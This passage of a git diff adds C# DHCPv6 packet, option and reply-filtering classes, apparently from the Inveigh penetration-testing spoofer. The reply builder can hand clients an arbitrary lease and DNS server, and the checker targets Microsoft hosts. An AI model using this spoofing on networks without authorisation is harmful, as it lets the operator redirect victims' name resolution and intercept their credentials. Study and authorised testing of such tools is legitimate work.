TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Checker + { + public string[] IgnoreMACs { get; set; } + public string[] ReplyToMACs { get; set; } + public IList HostCaptures { get; set; } + public bool Enabled { get; set; } + public bool Inspect { get; set; } + public bool Repeat { get; set; } + public bool Microsoft { get; set; } + public bool Local { get; set; } + public string OutputReplyAllowed { get; set; } + public string OutputMessage { get; set; } + public string OutputInspect { get; set; } + public string OutputDisabled { get; set; } + public string OutputLocal { get; set; } + public string OutputHostDenied { get; set; } + public string OutputMACDenied { get; set; } + public string OutputVendorDenied { get; set; } + public string OutputIPDenied { get; set; } + public string OutputRepeat { get; set; } + + public bool Check(string clientMAC, string clientHost, string listenerMAC, bool isMicrosoft) + { + + if (this.Inspect) + { + this.OutputMessage = this.OutputInspect; + return false; + } + else if (!this.Enabled) + { + this.OutputMessage = this.OutputDisabled; + return false; + } + else if (!isMicrosoft) + { + this.OutputMessage = this.OutputVendorDenied; + return false; + } + else if (IsLocal(clientMAC, listenerMAC)) + { + this.OutputMessage = this.OutputLocal; + return false; + } + else if (IsRepeat(clientHost)) + { + this.OutputMessage = this.OutputRepeat; + return false; + } + else if (MACIsDenied(clientMAC)) + { + this.OutputMessage = this.OutputMACDenied; + return false; + } + else if (!MACIsAllowed(clientMAC)) + { + this.OutputMessage = this.OutputMACDenied; + return false; + } + + this.OutputMessage = this.OutputReplyAllowed; + return true; + } + + public bool IsRepeat(string host) + { + host = host.Split('.')[0].ToUpper(); + + if (!this.Repeat && this.HostCaptures.Contains(host)) + { + return true; + } + + return false; + } + + public bool IsLocal(string clientMAC, string listenerMAC) + { + + if (!this.Local && string.Equals(clientMAC, listenerMAC)) + { + return true; + } + + return false; + } + + public bool MACIsDenied(string mac) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreMACs) && (Array.Exists(this.IgnoreMACs, element => element == mac.Replace(":", "").ToUpper()))) + { + return true; + } + + return false; + } + + public bool MACIsAllowed(string mac) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToMACs) && (!Array.Exists(this.ReplyToMACs, element => element == mac.Replace(":","").ToUpper()))) + { + return false; + } + + return true; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs new file mode 100644 index 0000000..d18df87 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs @@ -0,0 +1,86 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Message + { + // https://datatracker.ietf.org/doc/html/rfc3315#section-17.1.1 + public byte MsgType { get; set; } + public byte[] TransactionID { get; set; } // 3 bytes + public byte[] Options { get; set; } + + public DHCPv6Message() + { + + } + + public DHCPv6Message(byte[] data) + { + ReadBytes(data, 0); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.MsgType = packetReader.ReadByte(); + this.TransactionID = packetReader.ReadBytes(3); + this.Options = packetReader.ReadBytes(data.Length - 4); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.MsgType); + packetWriter.Write(this.TransactionID); + packetWriter.Write(this.Options); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs new file mode 100644 index 0000000..ca81e13 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs @@ -0,0 +1,222 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Packet + { + public DHCPv6Message Message { get; set; } + public DHCPv6Option1 Option1 { get; set; } + public DHCPv6Option2 Option2 { get; set; } + public DHCPv6Option3 Option3 { get; set; } + public DHCPv6Option6 Option6 { get; set; } + public DHCPv6Option8 Option8 { get; set; } + public DHCPv6Option14 Option14 { get; set; } + public DHCPv6Option16 Option16 { get; set; } + public DHCPv6Option23 Option23 { get; set; } + public DHCPv6Option24 Option24 { get; set; } + public DHCPv6Option39 Option39 { get; set; } + + public DHCPv6Packet() + { + + } + + public DHCPv6Packet(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Packet(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + this.Message = new DHCPv6Message(data); + + if (!Utilities.ArrayIsNullOrEmpty(this.Message.Options)) + { + + using (MemoryStream memoryStream = new MemoryStream(this.Message.Options)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + DHCPv6Option option = new DHCPv6Option(); + option.ReadBytes(this.Message.Options, 0); + + while (option.OptionCode != 0 && memoryStream.Length - memoryStream.Position >= 4) + { + option.ReadBytes(this.Message.Options, (int)memoryStream.Position); + + switch (option.OptionCode) + { + case 1: + this.Option1 = new DHCPv6Option1(this.Message.Options, (int)memoryStream.Position); + break; + + case 2: + this.Option2 = new DHCPv6Option2(this.Message.Options, (int)memoryStream.Position); + break; + + case 3: + this.Option3 = new DHCPv6Option3(this.Message.Options, (int)memoryStream.Position); + break; + + case 6: + this.Option6 = new DHCPv6Option6(this.Message.Options, (int)memoryStream.Position); + break; + + case 8: + this.Option8 = new DHCPv6Option8(this.Message.Options, (int)memoryStream.Position); + break; + + case 14: + this.Option14 = new DHCPv6Option14(this.Message.Options, (int)memoryStream.Position); + break; + + case 16: + this.Option16 = new DHCPv6Option16(this.Message.Options, (int)memoryStream.Position); + break; + + case 23: + this.Option23 = new DHCPv6Option23(this.Message.Options, (int)memoryStream.Position); + break; + + case 24: + this.Option24 = new DHCPv6Option24(this.Message.Options, (int)memoryStream.Position); + break; + + case 39: + this.Option39 = new DHCPv6Option39(this.Message.Options, (int)memoryStream.Position); + break; + } + + memoryStream.Position += option.OptionLen + 4; + } + + } + + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Message.MsgType); + packetWriter.Write(this.Message.TransactionID); + + if (this.Option8 != null) + { + packetWriter.Write(this.Option8.GetBytes()); + } + + if (this.Option1 != null) + { + packetWriter.Write(this.Option1.GetBytes()); + } + + if (this.Option2 != null) + { + packetWriter.Write(this.Option2.GetBytes()); + } + + if (this.Option3 != null) + { + packetWriter.Write(this.Option3.GetBytes()); + } + + if (this.Option23 != null) + { + packetWriter.Write(this.Option23.GetBytes()); + } + + if (this.Option24 != null) + { + packetWriter.Write(this.Option24.GetBytes()); + } + + if (this.Option39 != null) + { + packetWriter.Write(this.Option39.GetBytes()); + } + + if (this.Option16 != null) + { + packetWriter.Write(this.Option16.GetBytes()); + } + + if (this.Option6 != null) + { + packetWriter.Write(this.Option6.GetBytes()); + } + + return memoryStream.ToArray(); + } + + } + + public byte[] GetBytes(byte msgType, string leaseAddress, string listenerMAC, string dnsServer, string dnsSuffix, uint lifetime, DHCPv6Packet dhcpv6Packet) + { + + this.Message = new DHCPv6Message + { + MsgType = msgType, + TransactionID = dhcpv6Packet.Message.TransactionID + }; + + this.Option1 = dhcpv6Packet.Option1; + this.Option2 = new DHCPv6Option2(listenerMAC); + this.Option3 = new DHCPv6Option3(leaseAddress, lifetime, dhcpv6Packet.Option3.IAID); + this.Option23 = new DHCPv6Option23(dnsServer); + + if (!String.IsNullOrEmpty(dnsSuffix)) + { + this.Option24 = new DHCPv6Option24(dnsSuffix); + } + + return GetBytes(); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs new file mode 100644 index 0000000..6e630d1 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs @@ -0,0 +1,39 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option + { + public ushort OptionCode { get; set; } + public ushort OptionLen { get; set; } + + public DHCPv6Option() + { + + } + + public DHCPv6Option(byte[] data) + { + ReadBytes(data, 0); + } + + public void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs new file mode 100644 index 0000000..a67f759 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs @@ -0,0 +1,88 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option1 : DHCPv6Option + { + public byte[] DUID { get; set; } + + public DHCPv6Option1() + { + + } + + public DHCPv6Option1(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option1(byte[] data, int index) + { + ReadBytes(data, index); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.DUID = packetReader.ReadBytes(this.OptionLen); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.OptionCode); + packetWriter.BigEndianWrite(this.OptionLen); + packetWriter.Write(this.DUID); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs new file mode 100644 index 0000000..c098446 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs @@ -0,0 +1,86 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option14 : DHCPv6Option + { + + public DHCPv6Option14() + { + this.OptionCode = 14; + this.OptionLen = 0; + } + + public DHCPv6Option14(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option14(byte[] data, int index) + { + ReadBytes(data, index); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.OptionCode); + packetWriter.Write(this.OptionLen); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs new file mode 100644 index 0000000..7dd96fb --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs @@ -0,0 +1,90 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option16 : DHCPv6Option + { + public uint EnterpriseNumber { get; set; } + public byte[] VendorClassData { get; set; } + + public DHCPv6Option16() + { + + } + + public DHCPv6Option16(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option16(byte[] data, int index) + { + ReadBytes(data, index); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.EnterpriseNumber = packetReader.BigEndianReadUInt32(); + this.VendorClassData = packetReader.ReadBytes(this.OptionLen - 8); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.OptionCode); + packetWriter.Write(this.OptionLen); + packetWriter.Write(this.EnterpriseNumber); + packetWriter.Write(this.VendorClassData); + return memoryStream.ToArray(); + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs new file mode 100644 index 0000000..08adf57 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs @@ -0,0 +1,95 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option2 : DHCPv6Option + { + public byte[] DUID { get; set; } + + public DHCPv6Option2() + { + + } + + public DHCPv6Option2(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option2(byte[] data, int index) + { + ReadBytes(data, index); + } + + public DHCPv6Option2(string mac) + { + DHCPv6DUIDLL duid = new DHCPv6DUIDLL(mac); + this.OptionCode = 2; + this.DUID = duid.GetBytes(); + this.OptionLen = (ushort)this.DUID.Length; + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.DUID = packetReader.ReadBytes(this.OptionLen); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.OptionCode); + packetWriter.BigEndianWrite(this.OptionLen); + packetWriter.Write(this.DUID); + return memoryStream.ToArray(); + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs new file mode 100644 index 0000000..7a47786 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs @@ -0,0 +1,97 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.DHCPv6 +{ + class DHCPv6Option23 : DHCPv6Option + { + // https://datatracker.ietf.org/doc/html/rfc3646 + public byte[] DNSRecursiveNameServers { get; set; } + public DHCPv6Option23() + { + + } + + public DHCPv6Option23(byte[] data) + { + ReadBytes(data, 0); + } + + public DHCPv6Option23(byte[] data, int index) + { + ReadBytes(data, index); + } + + public DHCPv6Option23(string dnsRecursiveNameServer) + { + this.OptionCode = 23; + this.OptionLen = 16; + this.DNSRecursiveNameServers = IPAddress.Parse(dnsRecursiveNameServer).GetAddressBytes(); + } + + public new void ReadBytes(byte[] data, int index) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = index; + this.OptionCode = packetReader.BigEndianReadUInt16(); + this.OptionLen = packetReader.BigEndianReadUInt16(); + this.DNSRecursiveNameServers = packetReader.ReadBytes(this.OptionLen); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.OptionCode); + packetWriter.BigEndianWrite(this.OptionLen); + packetWriter.Write(this.DNSRecursiveNameServers); + return memoryStream.ToArray(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs new file mode 100644 index 0000000..ca197a7 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs @@ -0,0 +1,95 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO 